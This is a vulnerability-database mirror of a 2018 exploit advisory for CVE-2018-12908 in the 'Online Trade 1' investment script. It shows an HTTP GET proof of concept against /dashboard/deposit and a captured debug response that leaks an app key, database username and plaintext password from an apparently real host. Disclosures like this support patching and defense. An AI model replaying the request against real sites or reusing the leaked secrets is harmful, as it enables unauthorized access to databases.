Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBorna NematzadehPACKETSTORM:148421
HistoryJul 04, 2018 - 12:00 a.m.

Online Trade 1 Credential Disclosure

2018-07-0400:00:00
Borna Nematzadeh
packetstormsecurity.com
33

0.854 High

EPSS

Percentile

98.6%

JSON
`# Exploit Title: Online Trade 1 - Information Disclosure  
# Date: 2018-07-03  
# Exploit Author: L0RD  
# Vendor Homepage:  
https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14  
# CVE: CVE-2018-12908  
# Version: 1  
# Tested on: Win 10  
=======================================  
# Description :  
Online trading and cryptocurrency investment system 1 allows  
information disclosure by appending /dashboard/deposit.  
The following path contains database credentials and other information  
(username , password , database_name etc).  
  
# POC :  
  
# Request :  
===================  
GET /dashboard/deposit HTTP/1.1  
Host: trade.brynamics.xyz  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)  
Gecko/20100101 Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
===================  
# Response :  
===================  
HTTP/1.1 405 Method Not Allowed  
Date: Tue, 12 Jun 2018 21:21:45 GMT  
Server: Apache  
X-Powered-By: PHP/7.0.30  
allow: POST  
Cache-Control: no-cache, private  
Content-Type: text/html; charset=UTF-8  
Content-Length: 371161  
  
<td>APP_ENV</td><span class=sf-dump-str title="5  
characters">local</span></td>  
<td>APP_KEY</td><span class=sf-dump-str title="51  
characters">base64:NyL/WHTpZ0IhYKu7hHAzpF/Pvqn7+dD87tgpVvvEZrg=</span></td>  
<td>APP_URL</td><span class=sf-dump-str title="16 characters">  
http://localhost</span></td>  
<td>DB_CONNECTION</td><span class=sf-dump-str title="5  
characters">mysql</span></td>  
<td>DB_HOST</td><span class=sf-dump-str title="9  
characters">127.0.0.1</span></td>  
<td>DB_PORT</td><span class=sf-dump-str title="4  
characters">3306</span></td>  
<td>DB_DATABASE</td><span class=sf-dump-str title="14  
characters">torrpgug_trade</span></td>  
<td>DB_USERNAME</td><span class=sf-dump-str title="15  
characters">torrpgug_p2pguy</span></td>  
<td>DB_PASSWORD</td><span class=sf-dump-str title="15  
characters">undisputed@2017</span></td>  
<td>MAIL_HOST</td><span class=sf-dump-str title="16 characters">  
smtp.mailtrap.io</span></td>  
<td>MAIL_PORT</td><span class=sf-dump-str title="4 characters">2525</span>  
========================================  
  
`

Related

cvelist 2
prion 2
cve 2
zdt 1
exploitpack 1
nvd 2
exploitdb 1
cvelist
cvelist
CVE-2018-12908
2018-06-27 16:00:00
CVE-2018-14328
2018-07-23 20:00:00
prion
prion
Design/Logic Flaw
2018-06-27 16:29:00
Information disclosure
2018-07-23 20:29:00
cve
cve
CVE-2018-12908
2018-06-27 16:29:00
CVE-2018-14328
2018-07-23 20:29:00
zdt
zdt
Online Trade - Information Disclosure Vulnerability
2018-07-04 00:00:00
exploitpack
exploitpack
Online Trade - Information Disclosure
2018-07-04 00:00:00
nvd
nvd
CVE-2018-12908
2018-06-27 16:29:00
CVE-2018-14328
2018-07-23 20:29:00
exploitdb
exploitdb
Online Trade - Information Disclosure
2018-07-04 00:00:00

0.854 High

EPSS

Percentile

98.6%

JSON
Related for PACKETSTORM:148421
cvelist2prion2cve2zdt1exploitpack1nvd2exploitdb1